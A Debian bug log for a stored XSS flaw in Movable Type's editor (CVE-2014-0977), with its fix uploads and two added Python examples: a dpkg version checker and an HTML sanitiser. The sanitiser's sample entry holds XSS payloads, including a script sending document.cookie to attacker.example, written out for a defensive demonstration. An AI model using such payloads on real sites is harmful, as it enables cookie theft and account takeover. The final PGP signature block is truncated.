Debian Bug report logs - #734304
movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9 (CVE-2014-0977)


Package: src:movabletype-opensource; Maintainer for src:movabletype-opensource is Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>;

Reported by: Dominic Hargreaves <dom@earth.li>

Date: Sun, 5 Jan 2014 19:00:01 UTC

Severity: important

Tags: security

Found in version movabletype-opensource/5.2.7+dfsg-1

Fixed in versions movabletype-opensource/5.2.9+dfsg-1, movabletype-opensource/5.1.4+dfsg-4+deb7u1, movabletype-opensource/4.3.8+dfsg-0+squeeze4

Done: Dominic Hargreaves <dom@earth.li>

Bug is archived. No further changes may be made.
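Added example, not part of this bug log, of dpkg or of the package: a pure-Python re-implementation of dpkg's version ordering, used to decide whether an installed movabletype-opensource is at or past the fixed version recorded above for its suite. The three fixed versions are the ones this report lists; the suite labels, the function names and the sample installed versions are the example's own. The point it makes is that the comparison must be against the fixed version of the installed package's own branch: 5.1.4+dfsg-4+deb7u1 sorts below 5.2.9+dfsg-1, yet it is the fixed wheezy package.

```python
"""Debian package version ordering (dpkg semantics, Debian Policy 5.6.12),
re-implemented in Python so the fixed versions recorded in this bug can be
checked against an installed movabletype-opensource even where dpkg is not
available.  Added example; not part of the bug report, of dpkg or of the
package."""
import subprocess

# Fixed versions exactly as this report lists them, keyed by the suite each
# upload went to (the suite labels are the example's own, not from the log).
FIXED_IN = {
    "unstable": "5.2.9+dfsg-1",
    "wheezy": "5.1.4+dfsg-4+deb7u1",      # stable-security upload
    "squeeze": "4.3.8+dfsg-0+squeeze4",   # oldstable-security upload
}


def _order(c):
    """dpkg's weight for one non-digit character: '~' sorts before anything,
    including the end of the string (weight 0); letters sort before other
    non-letters."""
    if c == "~":
        return -1
    if c.isalpha():
        return ord(c)
    return ord(c) + 256


def _verrevcmp(a, b):
    """Compare two version fragments like dpkg's verrevcmp(): alternate a
    non-digit run (compared by character weight) and a digit run (compared
    numerically, leading zeros ignored) until one side wins."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) and not a[i].isdigit() else 0
            bc = _order(b[j]) if j < len(b) and not b[j].isdigit() else 0
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1          # a has more significant digits, so it is larger
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def _split(version):
    """'[epoch:]upstream[-revision]' -> (epoch, upstream, revision).  Only the
    last hyphen separates the revision; a missing revision compares as '0'."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:
        upstream, revision = version, ""
    return epoch, upstream, revision


def dpkg_compare(a, b):
    """Negative, zero or positive according to how dpkg orders a against b:
    epoch first, then upstream version, then Debian revision."""
    ea, ua, ra = _split(a)
    eb, ub, rb = _split(b)
    if ea != eb:
        return ea - eb
    return _verrevcmp(ua, ub) or _verrevcmp(ra, rb)


def is_fixed(installed, suite):
    """True when the installed version is at or past the fix for its suite."""
    return dpkg_compare(installed, FIXED_IN[suite]) >= 0


def installed_version(package="movabletype-opensource"):
    """Ask dpkg-query for the installed version; None if absent or no dpkg."""
    try:
        proc = subprocess.run(["dpkg-query", "-W", "-f=${Version}", package],
                              capture_output=True, text=True)
    except FileNotFoundError:
        return None
    return proc.stdout.strip() or None


if __name__ == "__main__":
    # Sample installed versions (constructed): the one this bug was found in,
    # the wheezy package before and after the security upload, and squeeze.
    for suite, sample in (("unstable", "5.2.7+dfsg-1"),
                          ("wheezy", "5.1.4+dfsg-4"),
                          ("wheezy", "5.1.4+dfsg-4+deb7u1"),
                          ("squeeze", "4.3.8+dfsg-0+squeeze3")):
        print(suite, sample, "fixed" if is_fixed(sample, suite) else "vulnerable")
```

Everything except installed_version() runs offline. Where dpkg is present, `dpkg --compare-versions` is the authoritative check; the Python ordering mirrors it (epoch, then upstream, then revision, with '~' sorting before the empty string and letters before other non-digits) so the same answer comes out on a machine that only has the version string, for example from an inventory export.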




Report forwarded to debian-bugs-dist@lists.debian.org, Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>:
Bug#734304; Package src:movabletype-opensource. (Sun, 05 Jan 2014 19:00:06 GMT)

Acknowledgement sent to Dominic Hargreaves <dom@earth.li>:
New Bug report received and forwarded. Copy sent to Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>. (Sun, 05 Jan 2014 19:00:06 GMT)

Message #5 received at submit@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: submit@bugs.debian.org
Subject: movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9
Date: Sun, 5 Jan 2014 18:44:57 +0000
Source: movabletype-opensource
Severity: important
Version: 5.2.7+dfsg-1
Tags: security

http://movabletype.org/news/2013/11/movable_type_601_529_and_5161_released_to_close_security_vul.html

DETAILS OF THE SECURITY UPDATES

The Rich Text Editor in previous versions of Movable Type 6 and Movable Type 5 is susceptible to cross-site scripting (XSS) attacks.  A remote attacker can inject JavaScript into a page or entry in a Movable Type blog or website.  This JavaScript can be executed on the client browser when that page or entry is subsequently displayed in the Rich Text Editor.

These vulnerabilities were reported by a member of the Movable Type community, and were kept confidential until the release of the updated versions of Movable Type.

5.2.9 is to be found at

http://www.movabletype.jp/downloads/stable/

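The class of bug described in the report above, and the generic defence against it, as an added example in Python using only the standard library. This is not Movable Type code, and the report does not say how upstream fixed 5.2.9, so the approach is illustrative rather than the actual patch. The stored XSS works because entry HTML is saved and later re-inserted into the Rich Text Editor: any script element, event-handler attribute or javascript: URL an author managed to save runs in the browser of whoever later opens that entry in the editor. The allow-list sanitiser below re-parses stored markup with html.parser, keeps only known tags and attributes, drops script/style/iframe content outright, rejects unsafe URL schemes and re-escapes text. The tag and attribute tables, the STORED_ENTRY sample and the function names are constructed for the example.

```python
"""Allow-list sanitiser for stored entry HTML, run before the markup is loaded
into a rich-text editor.  Added example using only the standard library; it is
not Movable Type's code and not the upstream fix for CVE-2014-0977."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Policy tables (constructed for the example; a real deployment tunes these).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "img", "ul", "ol",
                "li", "blockquote", "code", "pre", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}      # "" = relative URL
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


def _safe_url(value):
    """Reject javascript:, data:, vbscript: and any scheme not listed above.
    Spaces and control characters are removed first because browsers ignore
    them inside a scheme, so "java\\tscript:" would otherwise slip through."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES


class EntrySanitizer(HTMLParser):
    """Re-parses stored HTML and re-serialises only what the policy allows."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # serialised safe fragments
        self._open = []        # stack of emitted, still-open tags
        self._drop_depth = 0   # > 0 while inside script/style/iframe/...

    def handle_starttag(self, tag, attrs):
        if self._drop_depth:
            if tag in DROP_WITH_CONTENT:
                self._drop_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self._drop_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return             # unknown element: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or value is None:
                continue       # event handlers and valueless attributes go
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._drop_depth:
            if tag in DROP_WITH_CONTENT:
                self._drop_depth -= 1
            return
        if tag in self._open:  # close back down to it, repairing mis-nesting
            while True:
                closed = self._open.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self._open:      # close anything the author left open
            self.out.append("</%s>" % self._open.pop())
        return "".join(self.out)


def sanitize_entry(html):
    """Return a safe re-serialisation of stored entry HTML."""
    p = EntrySanitizer()
    p.feed(html)
    return p.result()


# Constructed sample of what an author could have saved into an entry.
STORED_ENTRY = (
    '<p onmouseover="alert(1)">Hello <b>world</b></p>'
    '<script>new Image().src="//attacker.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(document.domain)">click</a>'
    '<img src="x" onerror="alert(2)">'
    '<a href="https://example.org/">ok</a>'
)

if __name__ == "__main__":
    print(sanitize_entry(STORED_ENTRY))
```

Run as a script, the constructed entry comes back with the handler attributes, the script element and the javascript: link removed and the harmless markup intact. Two caveats a reviewer would raise: a hand-written filter like this is for illustration, and a maintained sanitiser library is the right production choice; and the sanitising has to happen before the markup reaches the editor (or any other context that renders it), because escaping only on public display leaves the editor path, which is the one the advisory names, exposed.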


Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sun, 05 Jan 2014 19:21:12 GMT)

Notification sent to Dominic Hargreaves <dom@earth.li>:
Bug acknowledged by developer. (Sun, 05 Jan 2014 19:21:12 GMT)

Message #10 received at 734304-close@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: 734304-close@bugs.debian.org
Subject: Bug#734304: fixed in movabletype-opensource 5.2.9+dfsg-1
Date: Sun, 05 Jan 2014 19:19:04 +0000
Source: movabletype-opensource
Source-Version: 5.2.9+dfsg-1

We believe that the bug you reported is fixed in the latest version of
movabletype-opensource, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734304@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated movabletype-opensource package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 05 Jan 2014 19:01:02 +0000
Source: movabletype-opensource
Binary: movabletype-opensource movabletype-plugin-core
Architecture: source all
Version: 5.2.9+dfsg-1
Distribution: unstable
Urgency: low
Maintainer: Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description: 
 movabletype-opensource - Well-known blogging engine
 movabletype-plugin-core - Core Movable Type plugins
Closes: 734304
Changes: 
 movabletype-opensource (5.2.9+dfsg-1) unstable; urgency=low
 .
   * New upstream release
     - fixes XSS security vulnerabilities (Closes: #734304)
Checksums-Sha1: 
 9e9fb9a8ce5bfde7fdd7dbba666efd7dfd39a1c2 2241 movabletype-opensource_5.2.9+dfsg-1.dsc
 73945cd2bec6a45853a44bb02d5e8c1ed8da2f7b 7976026 movabletype-opensource_5.2.9+dfsg.orig.tar.gz
 9cf2e4b3ca97f2743e340745e9ddd1614c33cd00 38163 movabletype-opensource_5.2.9+dfsg-1.debian.tar.gz
 670654ccd01d7665663b2f8eb2bb6e38a699d67a 2996606 movabletype-opensource_5.2.9+dfsg-1_all.deb
 3462d8bae91b135a4bd8746cd28fb54e0b6992d2 632510 movabletype-plugin-core_5.2.9+dfsg-1_all.deb
Checksums-Sha256: 
 c7169602644eac5b110f74ee1c4c7d2d57b049ad728eefe910607e12b0fb3aeb 2241 movabletype-opensource_5.2.9+dfsg-1.dsc
 c15f30100210a46cdf46f5193c431ab0dce086bdae00cb3b84ba4ceb078e40cd 7976026 movabletype-opensource_5.2.9+dfsg.orig.tar.gz
 5474178bbac12391f0bf74da0f82d2290bf5433cbdf621a18542d2f746065828 38163 movabletype-opensource_5.2.9+dfsg-1.debian.tar.gz
 94c6a1d0af37cd55d5241f28070fc28d25fe9f4da521229ad6fd1e5d1b787669 2996606 movabletype-opensource_5.2.9+dfsg-1_all.deb
 311f17f80f4ae28196e44741ee00db9f71a94f29adbacf5d1fc24ac4bdc97d8e 632510 movabletype-plugin-core_5.2.9+dfsg-1_all.deb
Files: 
 540acea617cc049a8a3e85fb0e381aab 2241 web optional movabletype-opensource_5.2.9+dfsg-1.dsc
 6ec71c50c9a119aa1a971c2f6720424c 7976026 web optional movabletype-opensource_5.2.9+dfsg.orig.tar.gz
 72e3a3a83284f04acc52a86526aac3d3 38163 web optional movabletype-opensource_5.2.9+dfsg-1.debian.tar.gz
 7434beccf55ec75974f4f06e959513a7 2996606 web optional movabletype-opensource_5.2.9+dfsg-1_all.deb
 a1ea5479d7f527788cc7c03acb8c068b 632510 web optional movabletype-plugin-core_5.2.9+dfsg-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBAgAGBQJSyaxEAAoJEMAFfnFNaU+yclUQAKch05QyGKXf40CinseN8Cr0
J+LQJPaNzKiVKxRAj1GnoKlHl38D77+vszccYdUcSBl84AvNCb1q6Vb0Hd+9gYe2
UYuObl4j8qaDKKpCfSbVtEb705deFtdBsbgFAqadZgLhCi81q5rWgL385yh95/+s
M3yOHxNFlMR0O543bXxgZ4afU85dSOowUqp1lJkDRzGAr3XlYiAXbmCBPq5ZiMSU
lL+K96N1R/JWlB2tNLcoysVKEgxWB10m10fQkPWDofeqiCSTAVqlDaFpZUdn1crp
7Nb6SObJ282jx6MmtojrXQfJv4OM3/OEp8MQX7opqQALgyeEtJZCznKigQ5c6SmK
+NBN5TVcx8cPL8IKbevAUQ0i+NIXzexMpiloyMpKqfQ54I/cj1r27iEItLf9/yWO
DROxtTyqC8IfxjBJOCo+ltsJr7hUjYdGQJoZMRxPj2vfDJELfmLQ+FGk/Bky0fra
fgemFe34bhYoJiTE9oG4Lx9dHSAATJuOw9kiqjYrAaXzTWu68jTwyTI0HaeIVRRI
xnP9sAdNKXAs7UoF4orfYuh85kU1fFKkED0NNbaSU6d0btR7bD0o8NxKqFhE1MX+
Sr3cJmlw744S2g5Vd8fEUQGmS6dm/MU9u466tIaXmR3kGNNK1cwcG2gYzH+W1vz0
3kSkVXJTK1/We2BwSNBQ
=aF7w
-----END PGP SIGNATURE-----




Changed Bug title to 'movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9 (CVE-2014-0977)' from 'movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9' Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 08 Jan 2014 05:21:06 GMT)

Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sun, 12 Jan 2014 21:21:59 GMT)

Notification sent to Dominic Hargreaves <dom@earth.li>:
Bug acknowledged by developer. (Sun, 12 Jan 2014 21:21:59 GMT)

Message #17 received at 734304-close@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: 734304-close@bugs.debian.org
Subject: Bug#734304: fixed in movabletype-opensource 5.1.4+dfsg-4+deb7u1
Date: Sun, 12 Jan 2014 21:17:15 +0000
Source: movabletype-opensource
Source-Version: 5.1.4+dfsg-4+deb7u1

We believe that the bug you reported is fixed in the latest version of
movabletype-opensource, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734304@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated movabletype-opensource package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 08 Jan 2014 19:42:23 +0000
Source: movabletype-opensource
Binary: movabletype-opensource movabletype-plugin-core movabletype-plugin-zemanta
Architecture: source all
Version: 5.1.4+dfsg-4+deb7u1
Distribution: stable-security
Urgency: high
Maintainer: Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description: 
 movabletype-opensource - Well-known blogging engine
 movabletype-plugin-core - Core Movable Type plugins
 movabletype-plugin-zemanta - Zemanta Movable Type plugin
Closes: 734304
Changes: 
 movabletype-opensource (5.1.4+dfsg-4+deb7u1) stable-security; urgency=high
 .
   * Add XSS security fixes from upstream release (CVE-2014-0977)
     (Closes: #734304)
Checksums-Sha1: 
 b27a77379c0668c288abce550b5d118076ff85bc 2342 movabletype-opensource_5.1.4+dfsg-4+deb7u1.dsc
 1900488ea761fea8211a2c5951d835cd7a283e2d 6237152 movabletype-opensource_5.1.4+dfsg.orig.tar.gz
 0360440118168659d8ece33a4200822159400115 36145 movabletype-opensource_5.1.4+dfsg-4+deb7u1.debian.tar.gz
 e29e325179347e0bb672c32775ab98c5ffc14f59 4111876 movabletype-opensource_5.1.4+dfsg-4+deb7u1_all.deb
 2c7830661c11d12cf54c5f46be0833c7bf6777f3 170626 movabletype-plugin-core_5.1.4+dfsg-4+deb7u1_all.deb
 28c954df1713ddc78b978484b14acd0af5e2bbe3 16432 movabletype-plugin-zemanta_5.1.4+dfsg-4+deb7u1_all.deb
Checksums-Sha256: 
 6f4f67eac43beb9d5574b5dfe2c1aa38792fac0d6ea15a8034e5f3995596a45a 2342 movabletype-opensource_5.1.4+dfsg-4+deb7u1.dsc
 fa649c02c5bd20d8d597af5beb97d02ff72b160a196a0de44ecbc15bf0be8398 6237152 movabletype-opensource_5.1.4+dfsg.orig.tar.gz
 631194caaa527dc0068c795a797f1dd0f91230315e2699a44c048a6ad809644a 36145 movabletype-opensource_5.1.4+dfsg-4+deb7u1.debian.tar.gz
 e3d1520511e0f9c740eb393448409a6f771c4ab495128d7c93c06f5324365e84 4111876 movabletype-opensource_5.1.4+dfsg-4+deb7u1_all.deb
 bdbaa553bed44c33d65c015c410ee710193723fa51cc103c661292276297a612 170626 movabletype-plugin-core_5.1.4+dfsg-4+deb7u1_all.deb
 5eba213d0da17a6f2178fbda266d37b2b7d7f2ebf67befba2c7eed9f77f7edd2 16432 movabletype-plugin-zemanta_5.1.4+dfsg-4+deb7u1_all.deb
Files: 
 d5b266830c218b32172914246bbca81f 2342 web optional movabletype-opensource_5.1.4+dfsg-4+deb7u1.dsc
 33f80318b618a884e0282c986edf97ea 6237152 web optional movabletype-opensource_5.1.4+dfsg.orig.tar.gz
 2dbd33e95ce4409aa477f0e0415cd0b2 36145 web optional movabletype-opensource_5.1.4+dfsg-4+deb7u1.debian.tar.gz
 095162d791ef70bdb8796bfb3342f0ee 4111876 web optional movabletype-opensource_5.1.4+dfsg-4+deb7u1_all.deb
 c7f4f0319e954da3f7da35303c9bdd83 170626 web optional movabletype-plugin-core_5.1.4+dfsg-4+deb7u1_all.deb
 6bd934f71c516424af43699ff4981592 16432 web optional movabletype-plugin-zemanta_5.1.4+dfsg-4+deb7u1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJSzaqeAAoJEMAFfnFNaU+yawoP/24upsU6W7ZPDDFgG8dwxE5r
vJY7B3jKwRz5BMUArO5o8AF6tcJy1OYO8XmiWTnNxe+pkv15efCra1vTBHqtOLQ5
sBzMZTwJlxfKEuC8j88tSYK6k+Cj9EygaWUmMnGHefy2v1d/gFjrQ8uTRzk0DO+R
Nc1gPEx7iNdddUPccqLk3woSGFh9bXJazgk50YyGJfyaV5z+56NHIPt7inhfLuGp
/reiHipEof2sr9QZq6XU/lY9NM+yY57bStMlx0OKoqCJpEZl5/G21DDwpAXuHpbQ
A3dAVJ8KOdMlyqor4PtePaOzPDvjIvUdxOFZz9L6xeEOzZvXMzOLKMiErFrPeXEy
rEPn3W6s7DeMXKS83A7wCJR11vJBfyYAF5H1L+HOsCVkEq4kNEravuz1UcLrrYgU
qsfIz1dw+MAZVCKMXukKHGq1HiJcY7iqIhTQIepNI1CuMx2k19qYeoK9dXu1cn8G
+6nvFMcXWjHw2ZiMidFFQgZCza687BEId3Q8S9If2C8raomQJudyL9PWqKQIiE7H
HmEdS3kFhFCIJTmCTX3x2FtguS8rcHp4ktiFC/YoK4gnQ3DmKUqc/zc8kAHU59Tl
fMTDEsoC9kCL3SajtD0T4GqddLdMEzjMVw4JsRSERD3oJPDXR/Y/LXalILqzBd0j
M3eYcCw0NdQS9Ctv0sny
=nauf
-----END PGP SIGNATURE-----




Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sun, 12 Jan 2014 22:06:20 GMT)

Notification sent to Dominic Hargreaves <dom@earth.li>:
Bug acknowledged by developer. (Sun, 12 Jan 2014 22:06:20 GMT)

Message #22 received at 734304-close@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: 734304-close@bugs.debian.org
Subject: Bug#734304: fixed in movabletype-opensource 4.3.8+dfsg-0+squeeze4
Date: Sun, 12 Jan 2014 22:02:32 +0000
Source: movabletype-opensource
Source-Version: 4.3.8+dfsg-0+squeeze4

We believe that the bug you reported is fixed in the latest version of
movabletype-opensource, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734304@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated movabletype-opensource package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 09 Jan 2014 19:32:26 +0000
Source: movabletype-opensource
Binary: movabletype-opensource movabletype-plugin-core movabletype-plugin-zemanta
Architecture: source all
Version: 4.3.8+dfsg-0+squeeze4
Distribution: oldstable-security
Urgency: high
Maintainer: Dominic Hargreaves <dom@earth.li>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description: 
 movabletype-opensource - A well-known blogging engine
 movabletype-plugin-core - Core Movable Type plugins
 movabletype-plugin-zemanta - Zemanta Movable Type plugin
Closes: 734304
Changes: 
 movabletype-opensource (4.3.8+dfsg-0+squeeze4) oldstable-security; urgency=high
 .
   * Include patch from 4.381 fixing XSS vulnerability (CVE-2014-0977)
     (Closes: #734304)
Checksums-Sha1: 
 5ac7c0f12c6458da504346b91adfcc99b65fd708 1935 movabletype-opensource_4.3.8+dfsg-0+squeeze4.dsc
 e64372eecb45b42aafd4e583398f00c6fa59cd5e 32804 movabletype-opensource_4.3.8+dfsg-0+squeeze4.diff.gz
 9846bd67de9587ca1dcbc5d5a52e6e1d07af83bd 2917302 movabletype-opensource_4.3.8+dfsg-0+squeeze4_all.deb
 67978e7a830bb0a64121011aa8ca6eff25720634 172026 movabletype-plugin-core_4.3.8+dfsg-0+squeeze4_all.deb
 4d3dcbf71917920ff0c82cf39c8379e5e5e22d4f 15050 movabletype-plugin-zemanta_4.3.8+dfsg-0+squeeze4_all.deb
Checksums-Sha256: 
 0997449a7a44da5321b2537ca5b164fd535ca11415e321486552024ccf2517d9 1935 movabletype-opensource_4.3.8+dfsg-0+squeeze4.dsc
 8e65e0c45bfd1e456b2d5d1add2e426008efe934cfd23dc57172388b188f3957 32804 movabletype-opensource_4.3.8+dfsg-0+squeeze4.diff.gz
 b3f32fc2e535657647f85ef8f60eac048077150d54684f52d6fe5342df7f0a7d 2917302 movabletype-opensource_4.3.8+dfsg-0+squeeze4_all.deb
 8d500b33800cbbe16c5bc88620cdd97a8c1259fa8a7503a003ca1768cbc73a52 172026 movabletype-plugin-core_4.3.8+dfsg-0+squeeze4_all.deb
 8a53f5d107ecd4b3f23cd686c326a293b3112a1accd06121875be3e4039cede4 15050 movabletype-plugin-zemanta_4.3.8+dfsg-0+squeeze4_all.deb
Files: 
 84b85fba984b408f3c773b88552bae66 1935 web optional movabletype-opensource_4.3.8+dfsg-0+squeeze4.dsc
 80a99093df2e5c3a8d62a00d5a5e17dc 32804 web optional movabletype-opensource_4.3.8+dfsg-0+squeeze4.diff.gz
 8420f7fd89833edfc38312fcbcd20844 2917302 web optional movabletype-opensource_4.3.8+dfsg-0+squeeze4_all.deb
 90997802071b0760c634c6478bb553f2 172026 web optional movabletype-plugin-core_4.3.8+dfsg-0+squeeze4_all.deb
 5b075f583f33955893141cece69d19b1 15050 web optional movabletype-plugin-zemanta_4.3.8+dfsg-0+squeeze4_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
=W/Jx
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 10 Feb 2014 07:25:52 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 05:49:31 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.